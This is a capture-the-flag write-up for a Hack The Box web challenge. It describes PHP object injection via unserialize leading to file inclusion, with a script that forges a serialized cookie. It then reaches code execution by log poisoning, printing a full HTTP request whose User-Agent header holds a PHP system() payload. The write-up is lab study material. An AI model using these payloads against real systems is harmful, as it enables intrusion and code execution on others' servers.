Toxic - HTB - Challenges

Challenge's address: 139.59.189.189:32670

Checking out the source code attached to the challenge, it's easy to spot the call to unserialize. Following this blog post, https://snoopysecurity.github.io/web-application-security/2021/01/08/02_php_object_injection_exploitation-notes.html, we note that the only model defined in the challenge also calls the destruct magic method, which will help us in our exploitation.

The method includes files, so it will allow us to read, we have a LFI on our hands. 

First we must construct an appropriate PHPSESSID to exploit the unsafe unserialization. My code to achieve this was the following one:

<?php
class PageModel{
        public $file;
}
$obj = new PageModel();
$obj->file = "$argv[1]";
echo serialize($obj);
?>

php -f test.php /etc/passwd | base64

We substitute our cookie with the new one in a request to index.php and the LFI is complete

Now we need to achieve RCE, as the flag name is randomized and we cannot find it through our basic LFI.

We can use Log Poisoning, reading /var/log/nginx/access.log after submitting a request with a fake header.

Here I show my request to poison the log file so that it will display the flag on the next request (you can just as well submit this one twice, one to poison, one to exploit the LFI and read the flag) 

GET /index.php HTTP/1.1
Host: 139.59.189.189:32670
User-Agent: <?php echo system('cat ../flag...S'); ?> 
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://139.59.189.189:32670/
Cookie: PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoyNToiL3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZyI7fQ

Merry hacking ;)